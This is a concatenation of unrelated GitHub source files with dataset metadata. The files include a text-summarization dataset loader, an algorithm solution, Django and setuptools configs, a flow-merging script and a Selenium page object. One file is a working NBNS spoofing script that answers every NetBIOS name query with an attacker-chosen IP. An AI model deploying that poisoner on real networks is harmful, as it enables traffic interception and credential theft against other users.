self.prompt = '1000000 {}'
elif type(bpe).__name__ == 'BertBPE':
self.prompt = "{} 请用一个句子简单总结上文:"
def __getitem__(self, index):
source, target = self.dataset[index]
target_str = target.lower()
source = self.pre_caption(source, max_words=self.max_src_length)
target = self.pre_caption(target, max_words=self.max_tgt_length)
source = source.replace('<unk>', 'unk')
target = target.replace('<unk>', 'unk')
src_item = self.encode_text(
self.prompt.format(source),
length=self.max_src_length
)
tgt_item = self.encode_text('{}'.format(target))
noise_tgt_item = self.add_noise_to_tgt(tgt_item.clone(), self.noise_ratio)
src_item = torch.cat([self.bos_item, src_item, self.eos_item])
target_item = torch.cat([tgt_item, self.eos_item])
prev_output_item = torch.cat([self.bos_item, noise_tgt_item])
example = {
"source": src_item,
"target": target_item,
"prev_output_tokens": prev_output_item,
"target_str": target_str
}
return example
def add_noise_to_tgt(self, target, p):
noise_indices = torch.FloatTensor(target.size(0)).uniform_() < p
target[noise_indices] = torch.randint(
4, len(self.src_dict) - self.code_dict_size - self.num_bins, size=(noise_indices.sum(),)
)
return target
def collater(self, samples, pad_to_length=None):
"""Merge a list of samples to form a mini-batch.
Args:
samples (List[dict]): samples to collate
Returns:
dict: a mini-batch containing the data of the task
"""
return collate(samples, pad_idx=self.pad, eos_idx=self.eos)
| evdcush/musketeer | data/nlg_data/summary_dataset.py | summary_dataset.py | py | 7,516 | python | en | code | 0 | github-code | 36 |
39013778439 | # https://www.acmicpc.net/problem/1987
# 알파벳
import sys
input = sys.stdin.readline
def bfs(r, c):
queue = set()
queue.add((r, c, arr[r][c]))
max_val = 0
while queue:
s = queue.pop()
max_val = max(max_val, len(s[2]))
for d in [[0, 1], [1, 0], [0, -1], [-1, 0]]:
nr = s[0] + d[0]
nc = s[1] + d[1]
if 0 <= nr < R and 0 <= nc < C and arr[nr][nc] not in s[2]:
queue.add((nr, nc, s[2] + arr[nr][nc]))
print(max_val)
R, C = map(int, input().split())
arr = [input() for _ in range(R)]
bfs(0, 0)
| eomsteve/algo_study | dm/8_week/1987.py | 1987.py | py | 595 | python | en | code | 0 | github-code | 36 |
18198988741 | """Providers filters file."""
from django.db import models
import django_filters
from tersun.common.filters import SearchComboboxBaseFilter
from tersun.providers import models as provider_models
class ProviderFilter(SearchComboboxBaseFilter):
"""Provider filter class."""
class Meta:
"""Meta class for the providers filter."""
model = provider_models.Provider
fields = "__all__"
filter_overrides = {
models.FileField: {
'filter_class': django_filters.CharFilter,
'extra': lambda f: {
'lookup_expr': 'icontains',
},
},
} | SonnyKundi/teebeauty_backend | tersun/providers/filters.py | filters.py | py | 671 | python | en | code | 0 | github-code | 36 |
69904891626 | from setuptools import setup
# To use a consistent encoding
from codecs import open
from os import path
with open('README.rst') as f:
long_desc = f.read()
setup(name='glucid',
version='0.5.0',
description='Configure the Lucid 8824 AD/DA Audio Interface via \
a Serial Connection',
url='http://github.com/danmechanic/glucid',
author='Daniel R Mechanic',
author_email='dan.mechanic@gmail.com',
license='GPL V3',
zip_safe=False,
# scripts=['bin/glucid','bin/xglucid'],
entry_points={ # Optional
'console_scripts': [
'glucid=glucid.glucid_cli:main',
'xglucid=glucid.xglucid:main'
],
},
long_description=long_desc,
keywords='lucid 8824 audio converter',
packages=['glucid'],
# py_modules=['glucid.glucid'],
python_requires=">=3",
package_dir={ 'glucid8824' : 'glucid',
'xglucid' : 'glucid',
'Glucid8824_UI' : 'glucid',
'Glucid8824' : 'glucid',
'xglucidUIWidgets' : 'glucid',
},
long_description_content_type='text/x-rst',
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'License :: OSI Approved :: GNU General Public License v3 (GPLv3)',
'Topic :: Multimedia :: Sound/Audio :: Conversion',
'Topic :: Multimedia :: Sound/Audio :: Capture/Recording',
],
project_urls={
'Author': 'http://www.danmechanic.com/',
'Source': 'https://github.com/danmechanic/glucid/',
},
install_requires=[
'PyQt5>=5.9',
'PySerial',
]
)
| danmechanic/glucid | setup.py | setup.py | py | 1,879 | python | en | code | 1 | github-code | 36 |
43587647307 | import argparse as _argparse
import os as _os
import sys as _sys
from colorama import Fore as _Fore
from colorama import init as _colorama_init
from contexttimer import Timer as _Timer
from src import merge as _merge
from src import parse as _parse
if __name__ == '__main__':
"""
Example: python merge.py --in pss_api_ios_v0.989.9402_anonymized.json pss_api_steam_v0.991.4_anonymized.json --out examples
"""
# enable Windows support of colors
_colorama_init()
ERR_INPUT_NOT_FOUND = 1
parser = _argparse.ArgumentParser()
parser.add_argument('--in', dest='in_', type=str, nargs='+', required=True, help='Path(s) to the flows file(s) to be merged')
parser.add_argument('--overrides', type=str, required=False, help='Path to the overrides file')
parser.add_argument('--outfile', type=str, required=True, help='Target file path for the merged flows file')
parser.add_argument('--uncompressed', action='store_true', help='Preserve whitespace in the output file')
args = parser.parse_args()
error = False
for file_path in args.in_:
if not _os.path.isfile(file_path):
print(f'{_Fore.RED}ERROR: Specified flows JSON file does not exist: {file_path}{_Fore.RESET}')
if error:
_sys.exit(ERR_INPUT_NOT_FOUND)
with _Timer() as t:
print(f'{_Fore.YELLOW} >>>{_Fore.RESET} Input files:')
for in_ in args.in_:
print(f'{_Fore.YELLOW} >>> -{_Fore.RESET} {in_}')
print(f'{_Fore.YELLOW} >>>{_Fore.RESET} Output file: {args.outfile}')
print(f'{_Fore.YELLOW} >>>{_Fore.RESET} Compressed storage: {"No" if args.uncompressed else "Yes"}')
print(f'{_Fore.BLUE} >>>{_Fore.RESET} Merging parsed flows...')
result = _merge.read_structure_json(args.in_[0])
for merge_with in args.in_[1:]:
result = _merge.merge_api_structures(
result,
_merge.read_structure_json(merge_with)
)
if args.overrides:
overrides = _merge.read_structure_json(args.overrides)
result = _merge.apply_overrides(result, overrides)
_parse.store_structure_json(
args.outfile,
result,
(not args.uncompressed)
)
print(f'{_Fore.BLUE} >>>{_Fore.RESET} Done in {t.elapsed}s')
_sys.exit(0)
| PSS-Tools-Development/pss-api-parser | merge.py | merge.py | py | 2,353 | python | en | code | 4 | github-code | 36 |
37722788260 | '''
商品详情页面
'''
from common.base import Base
good_url ='http://ecshop.itsoso.cn/goods.php?id=304'
class Buy_Good(Base):
'''页面点击立即购买'''
# 商品名字
good_name_loc=('class name','goods_style_name')
# 商品牌子
good_brand_loc=('css selector','a[href="brand.php?id=20"]')
# 购买数量框
number_loc=('id','number')
# 立即购买框
libuy_loc=('css selector','img[src="themes/default/images/buybtn1.png"]')
# 收藏按钮
collect_loc=('css selector','img[src="themes/default/images/bnt_colles.gif"]')
# 分享按钮
share_loc =('css selector','img[src="themes/default/images/bnt_recommend.gif"]')
# 价格
price_loc=('id','ECS_RANKPRICE_6')
# 前台商品货号
front_good_no_loc=('css selector','li.clearfix:nth-child(1)>dd:nth-child(1)')
# 点击商品牌子
def click_brand(self):
self.click(self.good_brand_loc)
# 购买数量输入
def send_number(self,num):
self.double_click(self.number_loc)
self.send_keys(self.number_loc,num)
self.click(self.price_loc)
# 点击立即购买
def click_libuy(self):
self.click(self.libuy_loc)
# 点击收藏按钮
def click_collect(self):
self.click(self.collect_loc)
# 点击分享按钮
def click_share(self):
self.click(self.share_loc)
# 获取商品名称
def get_good_name(self,locator):
element =self.find_element(locator)
text = element.text
return text
# 前台商品详情页面获取商品货号
def get_front_good_no(self):
element=self.find_element(self.front_good_no_loc)
content =element.text.split(':')
text =content[1] # ECS000304
# print(content) 商品货号:ECS000304
return text
if __name__ == '__main__':
from common.base import open_browser
from time import sleep
driver = open_browser('chrome')
libuy = Buy_Good(driver) # 实例化Buy_Good
libuy.open_url(good_url)
good_name_loc = ('class name', 'goods_style_name')
print(libuy.get_good_name(good_name_loc))
# 前台商品货号
front_good_no_loc = ('css selector', 'li.clearfix:nth-child(1)>dd:nth-child(1)')
num =libuy.get_front_good_no()
print(num)
# sleep(2)
# libuy.send_number(3)
# sleep(3)
#
#
# libuy.click_libuy()
| 15008477526/- | web_aaaaaaaa/page/good_details3.py | good_details3.py | py | 2,403 | python | en | code | 0 | github-code | 36 |
75310098025 | #!python
#/usr/bin/env python
# -*- coding:utf-8 -*-
__doc__ = """
NBNS Answer ,
by Her0in
"""
import socket, struct,binascii
class NBNS_Answer:
def __init__(self, addr):
self.IPADDR = addr
self.nas = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.init_socket()
self.populate()
def populate(self):
self.AnswerData = (
b"TID" # Transaction ID
b"\x85\x00" # Flags Query
b"\x00\x00" # Question
b"\x00\x01" # Answer RRS
b"\x00\x00" # Authority RRS
b"\x00\x00" # Additional RRS
b"\x20" # length of Name:32
b"NAME" # Name
b"\x00" # NameNull
b"\x00\x21" # Query Type:NB
b"\x00\x01" # Class
b"\x00\x00\x00\xa5" # TTL
b"\x00\x06" #
b"\x00\x00" # Null
b"IPADDR") # IP Address
def init_socket(self):
self.HOST = "0.0.0.0"
self.PORT = 137
self.nas.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.nas.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
def decode_name(self, nbname):
"""Return the NetBIOS first-level decoded nbname."""
if len(nbname) != 32:
return nbname
l = []
for i in range(0, 32, 2):
l.append(chr((((nbname[i]) - 0x41) << 4) |
(((nbname[i+1]) - 0x41) & 0xf)))
return ''.join(l).split('\x00', 1)[0]
def Answser(self):
self.nas.bind((self.HOST, self.PORT))
print("Listening...")
while 1:
data, addr = self.nas.recvfrom(1024)
tid = data[0:2]
name = data[13:45]
data = self.AnswerData.replace(b'TID', tid)
data = data.replace(b'NAME', name)
data = data.replace(b'IPADDR', socket.inet_aton(self.IPADDR))
print("Poisoned answer(%s) sent to %s for name %s " % (self.IPADDR, addr[0], self.decode_name(name)))
self.nas.sendto(data, addr)
self.nas.close()
if __name__ == "__main__":
nbns = NBNS_Answer("192.168.6.118")
nbns.Answser()
| b40yd/security | nbns_answser.py | nbns_answser.py | py | 2,347 | python | en | code | 96 | github-code | 36 |
8266325142 | import anki
from aqt import mw
import re
col = anki.collection.Collection('C:/Users/clept/AppData/Roaming/Anki2/Iván/collection.anki2')
deck_name = 'Seguridad social test'
search_query = '"deck:' + deck_name + '"'
cards = col.find_cards(search_query)
for card_id in cards:
# Get the card
card = col.get_card(card_id)
# Get the note associated with the card
note = card.note()
# bb = 'd (<a href="https://www.boe.es/buscar/act.php?id=BOE-A-2013-12632#a76">artículo 76.0</a>)'
text = note['Back']
try:
# matches 54.2, 2.b.0, índice
match = re.search(r'\">[a-záéíóú ]*(\d+\.\d+|índice|\d+\.[a-z]\.\d+|\d+)', text)
text_sort = match.group(1)
if text_sort == 'índice':
text_sort = '9999'
text_sort = re.sub('(\d+)(\.[a-z])(\.\d+)', '\\1\\3', text_sort)
if '.' not in text_sort:
text_sort += '.99'
if text_sort[-2] == '.':
text_sort = text_sort[:-1] + '0' + text_sort[-1:]
note['Sort'] = text_sort
except:
note['Sort'] = '9998.99'
note.flush()
# Synchronize the collection to save changes to the Anki database
col.autosave() | IvanDiazCostoya/anki-card-add-sort-field | main.py | main.py | py | 1,195 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.